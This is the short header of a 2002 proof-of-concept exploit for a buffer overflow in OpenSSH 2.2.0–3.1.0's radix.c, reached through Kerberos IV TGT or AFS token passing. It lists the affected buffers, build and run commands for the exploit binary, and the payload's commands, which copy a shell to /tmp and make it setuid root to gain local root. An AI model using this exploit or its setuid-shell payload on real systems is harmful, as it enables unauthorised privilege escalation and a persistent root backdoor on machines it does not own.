
- THIS IS A PROOF OF CONCEPT EXPOIT -
- 10/04/2002 -
- Marcell Fodor e-mail: m.fodor@mail.datanet.hu -


 code against OpenSSH 2.2.0 - 3.1.0 server

 
 effect:

	local root

 vulnerable services:

	-pass Kerberos IV TGT
	-pass AFS Token 

 bug details:

	radix.c
	GETSTRING macro in radix_to_creds function may cause buffer overflow.
	affected buffers:
	
	    creds->service
	    creds->instance
	    creds->realm
	    creds->pinst

 exploit code:
 
	-must have GNU MP Library installed  ftp://ftp.gnu.org/gnu/gmp
	-make
	-./tgt 127.0.0.1 <user> <password>

 egg:

	includes/egg.h
	
	    cp /bin/ash /tmp/ash
	    chmod 4755 /tmp/ash

	

